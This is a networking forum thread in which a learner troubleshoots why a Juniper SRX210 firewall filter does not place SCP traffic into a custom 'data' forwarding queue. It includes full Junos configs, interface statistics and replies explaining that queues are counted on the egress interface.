config traffic classification issue

‎10-09-2012 07:07 PM

This is not production, I am trying to learn. Thanks for taking the time to look.

 

Very basic issue: SRX210 with 2 virtual routers, using one for mgt. (Is there an issue using VRs?)

I assigned a forwarding class queue, created a firewall filter and applied it as input to interface.

Created the classifier and assigned interfaces. I committed...

I still see all traffic coming into the interface as best effort.

I verified traffic with a packet filter and I also set the interface to map everything to a different forwarding class using:

The following CLI commands can assign a forwarding class directly to packets received at a logical interface:

[edit class-of-service interfaces interface-name unit logical-unit-number]
forwarding-class class-name;

Here is the very basic config I am using (it may be familiar to some of you):
interfaces {
    ge-0/0/1 {
        unit 0 {
            family inet {
                address 172.18.121.2/30;
            }                           
        }
    }
    fe-0/0/4 {
        unit 0 {
            family inet {
                address 172.20.77.1/30;
            }
        }
    }
    fe-0/0/6 {
        unit 0 {
            family inet {
                filter {
                    input MF-class;
                }
                address 10.1.1.1/30;
            }
        }
    }
    fe-0/0/7 {
        unit 0 {
            family inet {
                address 10.100.100.2/24;
            }
        }                               
    }
    lo0 {
        unit 0 {
            family inet {
                address 192.168.121.1/32;
            }
        }
    }
}
forwarding-options {
    inactive: packet-capture {
        file filename localcapture;
        maximum-capture-size 1500;
    }
}
routing-options {
    router-id 192.168.121.1;
}
protocols {
    ospf {
        area 0.0.0.0 {
            interface fe-0/0/4.0 {
                interface-type p2p;
            }                           
            interface lo0.0;
            interface fe-0/0/6.0 {
                passive;
            }
        }
    }
}
class-of-service {
    classifiers {
        dscp BA-class {
            import default;
            forwarding-class expedited-forwarding {
                loss-priority low code-points [ ef cs5 ];
            }
        }
    }
    forwarding-classes {
        queue 4 data;
    }
    interfaces {
        fe-* {
            unit * {
                classifiers {
                    dscp BA-class;
                }                       
            }
        }
    }
}
security {
    forwarding-options {
        family {
            inet6 {
                mode packet-based;
            }
            mpls {
                mode packet-based;
            }
        }
    }
}
firewall {
    filter MF-class {
        term scp {
            from {
                destination-port 22;
            }
            then {
                loss-priority low;
                forwarding-class data;  
            }
        }
        term accept {
            then accept;
        }
    }
}
routing-instances {
    MANAGEMENT {
        instance-type virtual-router;
        interface fe-0/0/7.0;
    }
}



Re: config traffic classification issue

‎10-09-2012 07:51 PM

IIRC, without a rewrite rule applied to the interface, the traffic will be queued in queue 4 through the forwarding class, but it will not have any remarking applied, so if you PCAP the output it will still look like BE to the next router.

 

To verify that traffic is entering the FC/queue use the "show interfaces queue ge-x/y/z" command.

 

To create a rewrite rule take a look at this - http://www.juniper.net/techpubs/en_US/junos12.1/topics/example/security-rewrite-rule-transparent-mod...

 

Cheers,

Caillin


Re: config traffic classification issue

‎10-10-2012 02:39 AM

I don't get far enough for re-write rules. It does not put the traffic into the "data"  forwarding queue.

Do I have to use ge interfaces?


Re: config traffic classification issue

‎10-10-2012 04:51 AM

Hi,

Is the SCP traffic coming into the SRX through the fe-0/0/6 interface, or any other interfaces?

Because I can see the MF classifier is applied only to fe-0/0/6, and the other interfaces have BA classifiers.

 

Also, in which interface did you check the traffic for its forwarding class?

Can you post the "show interface xxx extensive"?

 

Rgds,

Moses N


Re: config traffic classification issue

‎10-10-2012 07:02 AM

I moved the fe-0/0/6 config to ge-0/0/0. The laptop generating the traffic is directly connected to ge-0/0/0.

I also changed the class of service interface to be ge-0/0/0 unit 0.

I added the output from "show interface ge-0/0/0 extensive" after the new config.

 

ray

 

interfaces {
    ge-0/0/0 {
        unit 0 {
            family inet {
                filter {
                    input MF-class;
                }                       
                address 10.1.1.1/30;
            }
        }
    }
    ge-0/0/1 {
        unit 0 {
            family inet {
                address 172.18.121.2/30;
            }
        }
    }
    fe-0/0/4 {
        unit 0 {
            family inet {
                address 172.20.77.1/30;
            }
        }
    }
    fe-0/0/7 {
        unit 0 {
            family inet {               
                address 10.100.100.2/24;
            }
        }
    }
    lo0 {
        unit 0 {
            family inet {
                address 192.168.121.1/32;
            }
        }
    }
}
forwarding-options {
    inactive: packet-capture {
        file filename localcapture;
        maximum-capture-size 1500;
    }
}
routing-options {
    router-id 192.168.121.1;
}
protocols {
    ospf {
        area 0.0.0.0 {
            interface fe-0/0/4.0 {      
                interface-type p2p;
            }
            interface lo0.0;
            interface ge-0/0/0.0;
        }
    }
}
class-of-service {
    classifiers {
        dscp BA-class {
            import default;
            forwarding-class expedited-forwarding {
                loss-priority low code-points [ ef cs5 ];
            }
        }
    }
    forwarding-classes {
        queue 4 data;
    }
    interfaces {
        ge-0/0/0 {
            unit 0 {
                classifiers {
                    dscp BA-class;
                }
            }                           
        }
    }
}
security {
    forwarding-options {
        family {
            inet6 {
                mode packet-based;
            }
            mpls {
                mode packet-based;
            }
        }
    }
}
firewall {
    filter MF-class {
        term scp {
            from {
                destination-port 22;
            }
            then {
                loss-priority low;
                forwarding-class data;
            }
        }                               
        term accept {
            then accept;
        }
    }
}
routing-instances {
    MANAGEMENT {
        instance-type virtual-router;
        interface fe-0/0/7.0;
    }
}
R2# run show interfaces extensive
Physical interface: ge-0/0/0, Enabled, Physical link is Up
  Interface index: 134, SNMP ifIndex: 509, Generation: 137
  Link-level type: Ethernet, MTU: 1514, Link-mode: Full-duplex, Speed: 1000mbps, BPDU Error: None,
  MAC-REWRITE Error: None, Loopback: Disabled, Source filtering: Disabled, Flow control: Enabled,
  Auto-negotiation: Enabled, Remote fault: Online
  Device flags   : Present Running
  Interface flags: SNMP-Traps Internal: 0x0
  Link flags     : None
  CoS queues     : 8 supported, 8 maximum usable queues
  Hold-times     : Up 0 ms, Down 0 ms
  Current address: a8:d0:e5:a9:07:c0, Hardware address: a8:d0:e5:a9:07:c0
  Last flapped   : 2012-10-10 18:59:03 UTC (02:52:38 ago)
  Statistics last cleared: 2012-10-10 19:19:17 UTC (02:32:24 ago)
  Traffic statistics:
   Input  bytes  :                21894                    0 bps
   Output bytes  :               176541                    0 bps
   Input  packets:                  247                    0 pps
   Output packets:                 1227                    0 pps
  Input errors:
    Errors: 0, Drops: 0, Framing errors: 0, Runts: 0, Policed discards: 0, L3 incompletes: 0,
    L2 channel errors: 0, L2 mismatch timeouts: 0, FIFO errors: 0, Resource errors: 0
  Output errors:
    Carrier transitions: 0, Errors: 0, Drops: 0, Collisions: 0, Aged packets: 0, FIFO errors: 0,
    HS link CRC errors: 0, MTU errors: 0, Resource errors: 0
  Egress queues: 8 supported, 5 in use
  Queue counters:       Queued packets  Transmitted packets      Dropped packets
    0 best-effort                  179                  179                    0
    1 expedited-fo                   0                    0                    0
    2 assured-forw                   0                    0                    0
    3 network-cont                1048                 1048                    0
    4 data                           0                    0                    0
  Queue number:         Mapped forwarding classes
    0                   best-effort
    1                   expedited-forwarding
    2                   assured-forwarding
    3                   network-control
    4                   data        
  Active alarms  : None
  Active defects : None
  MAC statistics:                      Receive         Transmit
    Total octets                         26668           142135
    Total packets                          247             1227
    Unicast packets                        220              174
    Broadcast packets                       27                5
    Multicast packets                        0             1048
    CRC/Align errors                         0                0
    FIFO errors                              0                0
    MAC control frames                       0                0
    MAC pause frames                         0                0
    Oversized frames                         0
    Jabber frames                            0
    Fragment frames                          0
    VLAN tagged frames                       0
    Code violations                          0
  Filter statistics:
    Input packet count                       0
    Input packet rejects                     0
    Input DA rejects                         0
    Input SA rejects                         0
    Output packet count                                       0
    Output packet pad count                                   0
    Output packet error count                                 0
    CAM destination filters: 4, CAM source filters: 0
  Autonegotiation information:
    Negotiation status: Complete
    Link partner:
        Link mode: Full-duplex, Flow control: None, Remote fault: OK, Link partner Speed: 1000 Mbps
    Local resolution:
        Flow control: None, Remote fault: Link OK
  Packet Forwarding Engine configuration:
    Destination slot: 0
  CoS information:
    Direction : Output
    CoS transmit queue               Bandwidth               Buffer Priority   Limit
                              %            bps     %           usec
    0 best-effort            95      950000000    95              0      low    none
    3 network-control         5       50000000     5              0      low    none
  Interface transmit statistics: Disabled
                                        
  Logical interface ge-0/0/0.0 (Index 76) (SNMP ifIndex 510) (Generation 141)
    Flags: SNMP-Traps 0x0 Encapsulation: ENET2
    Traffic statistics:
     Input  bytes  :                21894
     Output bytes  :               134621
     Input  packets:                  247
     Output packets:                 1227
    Local statistics:
     Input  bytes  :                 5718
     Output bytes  :                94740
     Input  packets:                   32
     Output packets:                 1058
    Transit statistics:
     Input  bytes  :                16176                    0 bps
     Output bytes  :                39881                    0 bps
     Input  packets:                  215                    0 pps
     Output packets:                  169                    0 pps
    Security: Zone: Null
    Flow Statistics :  
    Flow Input statistics :
      Self packets :                     0
      ICMP packets :                     0
      VPN packets :                      0
      Multicast packets :                0
      Bytes permitted by policy :        0
      Connections established :          0
    Flow Output statistics:
      Multicast packets :                0
      Bytes permitted by policy :        0
    Flow error statistics (Packets dropped due to):
      Address spoofing:                  0
      Authentication failed:             0
      Incoming NAT errors:               0
      Invalid zone received packet:      0
      Multiple user authentications:     0
      Multiple incoming NAT:             0
      No parent for a gate:              0
      No one interested in self packets: 0       
      No minor session:                  0
      No more sessions:                  0
      No NAT gate:                       0
      No route present:                  0
      No SA for incoming SPI:            0
      No tunnel found:                   0
      No session for a gate:             0
      No zone or NULL zone binding       0
      Policy denied:                     0
      Security association not active:   0
      TCP sequence number out of window: 0
      Syn-attack protection:             0
      User authentication errors:        0
    Protocol inet, MTU: 1500, Generation: 157, Route table: 0
      Flags: Sendbcast-pkt-to-re
      Input Filters: MF-class
      Addresses, Flags: Is-Preferred Is-Primary
        Destination: 10.1.1.0/30, Local: 10.1.1.1, Broadcast: 10.1.1.3, Generation: 158



Re: config traffic classification issue

‎10-10-2012 12:56 PM

Hi,

Forwarding classes are associated with output queues. Packets are queued when they leave the device.

You mentioned that you are generating the traffic from ge-0/0/0, so it is the input interface for this traffic. You need to check the forwarding class on the output interface.

If you run the "show interface xxxx extensive.." command on the output interface, you might see packets in the data queue.

 

Regards,

Moses N
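
The check described in the reply above, as an added example that is not part of the original thread: a Python parser for the queue tables of `show interfaces extensive` output captured on the egress interface, reporting whether a forwarding class saw traffic. The sample text is constructed in the layout quoted earlier in the thread (counter values are made up), and the function names are hypothetical.

```python
import re

# Constructed sample in the layout of the "show interfaces extensive" output
# quoted in this thread (counter values are made up for the example).
SAMPLE = """\
  Egress queues: 8 supported, 5 in use
  Queue counters:       Queued packets  Transmitted packets      Dropped packets
    0 best-effort                  179                  179                    0
    1 expedited-fo                   0                    0                    0
    2 assured-forw                   0                    0                    0
    3 network-cont                1048                 1048                    0
    4 data                          42                   42                    0
  Queue number:         Mapped forwarding classes
    0                   best-effort
    1                   expedited-forwarding
    2                   assured-forwarding
    3                   network-control
    4                   data
  Active alarms  : None
"""

COUNTER = re.compile(r"^\s*(\d+)\s+\S+\s+(\d+)\s+(\d+)\s+(\d+)\s*$")
MAPPING = re.compile(r"^\s*(\d+)\s+([a-z][\w-]*)\s*$")

def queue_stats(text):
    """Parse one interface's output into {forwarding-class: counters}."""
    counters, names, section = {}, {}, None
    for line in text.splitlines():
        if line.lstrip().startswith("Queue counters:"):
            section = "counters"
        elif line.lstrip().startswith("Queue number:"):
            section = "mapping"
        elif section == "counters" and (m := COUNTER.match(line)):
            q, queued, sent, dropped = map(int, m.groups())
            counters[q] = {"queue": q, "queued": queued,
                           "transmitted": sent, "dropped": dropped}
        elif section == "mapping" and (m := MAPPING.match(line)):
            names[int(m.group(1))] = m.group(2)
        elif section == "mapping":
            section = None  # first non-matching line ends the mapping table
    # The counters table truncates class names; the mapping table has them in full.
    return {names.get(q, f"queue-{q}"): c for q, c in counters.items()}

def class_saw_traffic(text, forwarding_class):
    """True if the egress interface queued any packets in the given class."""
    stats = queue_stats(text).get(forwarding_class)
    return bool(stats and stats["queued"] > 0)
```
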


Re: config traffic classification issue

‎10-10-2012 02:18 PM

Thanks, I was checking. It seems like a bug. I put the same config on an MX80 running 10.4 and it worked fine.

Not sure if it's SRX or Junos 11.4r4 that's the issue.
